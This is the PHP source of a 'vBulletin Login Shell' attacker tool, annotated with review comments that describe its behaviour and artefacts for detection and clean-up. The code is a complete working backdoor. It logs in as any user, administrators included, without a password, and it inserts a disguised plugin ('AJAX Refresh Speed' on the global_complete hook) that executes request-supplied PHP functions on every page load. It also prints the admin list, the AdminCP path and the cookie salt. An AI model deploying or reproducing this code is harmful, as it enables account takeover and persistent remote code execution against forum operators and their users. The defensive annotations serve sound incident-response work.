<?php
/**
* vBulletin 3.8.x-4.x Login Shell
* Author: JB (jb@p0wersurge.com)
* www.p0wersurge.com
* 13/01/2014 (updated 26/07/2015)
* Version 1.9
*/
/*
 * NOTE(review): this file is an attacker tool, not an application component. It
 * bootstraps the vBulletin runtime via global.php and then (a) for any username
 * supplied in the request, issues the forum's authentication cookies without
 * checking a password, (b) on request inserts a row into the plugin table whose
 * PHP code calls a function named by two request parameters, and (c) prints
 * the administrator list, the AdminCP directory and the cookie salt.
 * Finding this file (or the artefacts named in the comments below) in a web
 * root is an indicator of compromise. The comments describe what each part
 * does and what it leaves behind, to support detection and clean-up.
 */
#chdir('../');
// Bootstraps vBulletin from the current directory; the (commented-out) chdir
// above suggests the file is meant to sit in the forum root next to global.php.
require_once('./global.php');
// SELF is echoed unescaped into the HTML below as form action and link target.
define('SELF', $_SERVER['PHP_SELF']);
// Error output is suppressed so failures never surface in the response.
@ini_set('display_errors', false);
error_reporting(0);
// Two variants keyed on the major version. $fullperms is the adminpermissions
// value that the admin list below labels "(full permissions)".
if(substr($vbulletin->versionnumber, 0, 1) > 3)
{
$fullperms = '16744444';
/**
 * vB4+ variant. Looks the user up by username only; when a row exists it calls
 * set_authentication_cookies() and returns true. password and salt are selected
 * but never compared against anything, so any existing username "logs in".
 * vBulletin's own login_verify_success / login_verify_failure_username hooks are
 * still fired, so hook-based login auditing may record these events.
 *
 * @param string $username  value taken from the request
 * @return bool true when a user row was found and cookies were issued
 */
function verify_authentication2($username)
{
global $vbulletin;
 
$username = strip_blank_ascii($username, ' ');
 
if ($vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid, usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '" . $vbulletin->db->escape_string(htmlspecialchars_uni($username)) . "'"))
{
set_authentication_cookies($cookieuser);
 
$return_value = true;
($hook = vBulletinHook::fetch_hook('login_verify_success')) ? eval($hook) : false;
return $return_value;
}
 
$return_value = false;
($hook = vBulletinHook::fetch_hook('login_verify_failure_username')) ? eval($hook) : false;
return $return_value;
}
}
else
{
$fullperms = '491516';
/**
 * vB3 variant. Same username-only lookup, but the cookies are written directly:
 * a 'userid' cookie and a 'password' cookie holding md5(stored hash . COOKIE_SALT).
 * If a different user's cookie is already present it is cleared first. As above,
 * no password is ever verified.
 *
 * @param string $username  value taken from the request
 * @return bool true when a user row was found and cookies were issued
 */
function verify_authentication2($username)
{
global $vbulletin;
 
$username = strip_blank_ascii($username, ' ');
 
if ($vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid, usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '" . $vbulletin->db->escape_string(htmlspecialchars_uni($username)) . "'"))
{
if ($vbulletin->GPC[COOKIE_PREFIX . 'userid'] AND $vbulletin->GPC[COOKIE_PREFIX . 'userid'] != $vbulletin->userinfo['userid'])
{
// we have a cookie from a user and we're logging in as
// a different user and we're not going to store a new cookie,
// so let's unset the old one
vbsetcookie('userid', '', true, true, true);
vbsetcookie('password', '', true, true, true);
}
vbsetcookie('userid', $vbulletin->userinfo['userid'], true, true, true);
vbsetcookie('password', md5($vbulletin->userinfo['password'] . COOKIE_SALT), true, true, true);
$return_value = true;
($hook = vBulletinHook::fetch_hook('login_verify_success')) ? eval($hook) : false;
return $return_value;
}
 
$return_value = false;
($hook = vBulletinHook::fetch_hook('login_verify_failure_username')) ? eval($hook) : false;
return $return_value;
}
}
 
// AdminCP directory discovery: every subdirectory of the current directory that
// is not in the standard-directory list below and contains adminlog.php is
// recorded in $guess. This is a read-only filesystem scan (scandir/file_exists).
$guess = array();
$known = array(
'archive',
'clientscript',
'cpstyles',
'customavatars',
'customgroupicons',
'customprofilepics',
'attach',
'forumrunner',
'images',
'includes',
'install',
'packages',
'signaturepics',
'store_sitemap',
'vb'
);
// The configured AdminCP directory is also read from the installation's config.
$admindir = $vbulletin->config['Misc']['admincpdir'];
$complete = $vbulletin->options['bburl'] . '/' . $admindir . '/index.php';
$results = scandir('.');
 
foreach ($results as $result) {
if ($result == '.' or $result == '..') continue;
 
if (is_dir('./' . $result)) {
if(in_array($result, $known)) continue;
if(@file_exists($result . '/adminlog.php'))
{
$guess[] = $result;
} else {
continue;
}
}
}
 
// Action 1: ?do=login&username=<name-or-userid>. The form below submits via
// GET, so these requests show up in web-server access logs with both parameters
// in the query string. The value is matched against username OR userid, then
// the password-less verify_authentication2() above issues the cookies and
// vBulletin's normal post-login bookkeeping runs (exec_unstrike_user,
// process_new_login with the 'cplogin' type, redirect). What process_new_login
// records in this version is not visible here — check it when building timelines.
if(isset($_REQUEST['do']) && $_REQUEST['do'] == 'login' && isset($_REQUEST['username']))
{
require_once(DIR . '/includes/functions_login.php');
 
$username = $_REQUEST['username'];
$q = "SELECT username FROM " . TABLE_PREFIX . "user WHERE username = '" . $vbulletin->db->escape_string($username) . "' OR userid = '" . $vbulletin->db->escape_string($username) . "'";
$query = $vbulletin->db->query_first($q);
if($query['username'] != null)
{
if(verify_authentication2($query['username']))
{
exec_unstrike_user($query['username']);
 
process_new_login('cplogin', true, null);
 
do_login_redirect();
}
else
{
die('Verify failed');
}
}
else
{
die('User not found.');
}
}
// Action 2: ?do=injectplugin. Persists a backdoor as a vBulletin plugin row.
// Artefacts to look for in the `plugin` table: title 'AJAX Refresh Speed',
// hookname 'global_complete', active = 1, executionorder = 5, product set to a
// randomly chosen *active* installed product (or 'vbulletin' when none exist),
// and phpcode that calls a function named by $_REQUEST['x'] with $_REQUEST['y']
// as its argument. The same product query is repeated in the default view below.
elseif($_REQUEST['do'] == 'injectplugin')
{
$products = array();
$query = $vbulletin->db->query("SELECT productid,title,version,active,url FROM " . TABLE_PREFIX . "product");
if($vbulletin->db->num_rows($query) > 0)
{
while($product = $vbulletin->db->fetch_array($query))
{
$productinfo = array();
$productinfo['productid'] = $product['productid'];
$productinfo['title'] = $product['title'];
$productinfo['version'] = $product['version'];
$productinfo['active'] = $product['active'];
$productinfo['url'] = $product['url'];
$products[] = $productinfo;
}
}
 
// choose a random product if productcount > 0 else inject into vbulletin
$productcount = count($products);
// The title is chosen to look like a benign feature; do not rely on the title
// alone when hunting — match on hookname plus the phpcode pattern as well.
$plugin['title'] = 'AJAX Refresh Speed';
$plugin['hookname'] = 'global_complete';
// NOTE(review): this string is the stored payload. It is a variable-function
// call on two request parameters and executes on every page load once the
// plugin is active (global_complete hook).
$plugin['phpcode'] = 'if(isset($_REQUEST[\'x\'])){$_REQUEST[\'x\']($_REQUEST[\'y\']);}';
if(intval($productcount) > 0)
{
// failsafe incase product is disabled - we should only ever be injecting into an enabled product, or our injection is worthless
// optional really, you can just make it insert into vbulletin itself but that's not really as covert as i'd like
retrymtrand:
$rand = mt_rand(0, intval($productcount));
if($products[$rand]['active'])
{
$plugin['product'] = $products[$rand]['productid'];
}
else
{
goto retrymtrand;
}
}
else
{
$plugin['product'] = 'vbulletin';
}
$plugin['devkey'] = '';
$plugin['active'] = '1';
$plugin['executionorder'] = '5';
 
$vbulletin->db->query("
INSERT INTO " . TABLE_PREFIX . "plugin
(
hookname,
title,
phpcode,
product,
active,
executionorder
)
VALUES
(
'" . $plugin['hookname'] . "',
'" . $plugin['title'] . "',
'" . $vbulletin->db->escape_string($plugin['phpcode']) . "',
'" . $vbulletin->db->escape_string($plugin['product']) . "',
" . intval($plugin['active']) . ",
" . intval($plugin['executionorder']) . "
)
");
$pluginid = $vbulletin->db->insert_id();
// update the datastore
// The hook code is cached in the datastore, which is rebuilt here right after
// the insert. Presumably deleting the plugin row alone leaves the cached copy
// in place until the datastore is rebuilt — confirm for the installed version
// before considering a clean-up complete.
vBulletinHook::build_datastore($db);
// Confirmation page: echoes the new plugin id and the inserted row.
?>
<h1>Plugin <?php echo $pluginid; ?> created on global_complete!</h1>
<pre>
<?php echo print_r($plugin); ?>
</pre>
<a href="<?php echo SELF; ?>">Go back</a>
<?php
}
// Default view (no recognised action): collects administrator accounts and
// installed products, then renders the control page.
else
{
// Usergroups with adminpermissions = '3' are collected here but $admin_usergroups
// is not referenced again in this file.
$admin_usergroups = array();
$admin_usergroups_query = $vbulletin->db->query("SELECT usergroupid FROM " . TABLE_PREFIX . "usergroup WHERE adminpermissions = '3'");
while($admin_usergroup = $vbulletin->db->fetch_array($admin_usergroups_query))
{
$admin_usergroups[] = $admin_usergroup['usergroupid'];
}
// One entry per row of the administrator table, enriched via fetch_userinfo().
$admins = array();
$query = $vbulletin->db->query("SELECT userid,adminpermissions FROM " . TABLE_PREFIX . "administrator");
while($user = $vbulletin->db->fetch_array($query))
{
$userinfo = fetch_userinfo($user['userid']);
$userarray = array();
$userarray['userid'] = $userinfo['userid'];
$userarray['username'] = $userinfo['username'];
$userarray['musername'] = fetch_musername($userinfo);
$userarray['adminpermissions'] = $user['adminpermissions'];
$admins[] = $userarray;
}
$products = array();
$query = $vbulletin->db->query("SELECT productid,title,version,active,url FROM " . TABLE_PREFIX . "product");
if($vbulletin->db->num_rows($query) > 0)
{
while($product = $vbulletin->db->fetch_array($query))
{
$productinfo = array();
$productinfo['productid'] = $product['productid'];
$productinfo['title'] = $product['title'];
$productinfo['version'] = $product['version'];
$productinfo['active'] = $product['active'];
$productinfo['url'] = $product['url'];
$products[] = $productinfo;
}
}
// The page below: a GET login form (do=login), one do=login link per
// administrator, the configured and guessed AdminCP directories, a link to
// do=injectplugin, and the installation's TABLE_PREFIX, COOKIE_PREFIX and
// COOKIE_SALT. Because COOKIE_SALT is printed to anyone who could reach this
// file, treat it as disclosed during incident response; the vB3 path above
// derives the 'password' cookie from it.
?>
<h1>vBulletin Login Shell | CP Login (<?php echo $vbulletin->options['bbtitle']; ?>) (vB<?php echo $vbulletin->versionnumber; ?>)</h1>
<hr />
<form action="<?php echo SELF; ?>" method="get">
<input type="hidden" name="do" value="login" />
<input type="text" name="username" value="" />
<input type="submit" name="login" value="Login as user" />
</form>
<hr />
<p>Admins found: <?php echo count($admins); ?></p>
<p><?php foreach($admins as $admin){ echo '<a href="' . SELF . '?do=login&username=' . $admin['username'] . '">' . $admin['musername'] . '</a>' . (($admin['adminpermissions'] == $fullperms) ? ' (full permissions)' : '') . ' ';} ?></p>
<hr />
<p>AdminCP directory detected in config: <a href="<?php echo $complete; ?>" target="_blank"><?php echo $admindir; ?></a></p>
<p>Possible AdminCP directories (from existing subdirectories minus vBulletin standard): <?php foreach($guess as $dir) { echo '<a href="' . $vbulletin->options['bburl'] . '/' . $dir . '/index.php" target="_blank">' . $dir . '</a> '; }?></p>
<hr />
<a href="<?php echo SELF; ?>?do=injectplugin">Inject malicious plugin</a>
<hr />
<p>Table prefix: <?php echo TABLE_PREFIX; ?></P>
<p>Cookie prefix: <?php echo COOKIE_PREFIX; ?></P>
<p>Cookie salt: <?php echo COOKIE_SALT; ?></P>
<hr />
<?php if(count($products) > 0) { ?>
<h3>Installed Products</h3>
<ul>
<?php
// Product list: green for active products, red for inactive; the title links
// to the product URL when one is set.
foreach($products as $product)
{
if($product['active'])
{
$color = 'green';
}
else
{
$color = 'red';
}
 
echo '<li><span style="color: ' . $color . ';">' . ((trim($product['url']) != null) ? '<a style="color: ' . $color . '" href="' . trim($product['url']) . '" target="_blank">' : '') . $product['title'] . ((trim($product['url']) != null) ? '</a>' : '') . ' (' . $product['version'] . ')</span></li>';
}
?>
</ul>
<hr />
<?php } ?>
<h6>Written by <a href="https://twitter.com/xijailbreakx" target="_blank">@xijailbreakx</a>. This file allows you to override the default vBulletin login system and login to the control panel and forums as anyone. It also tries to find the admincp directory, by using both the configuration file (possibly incorrectly set) and by guessing based on existing subdirectories (nearly 100% successful).</h6>
 
<?php
}
?>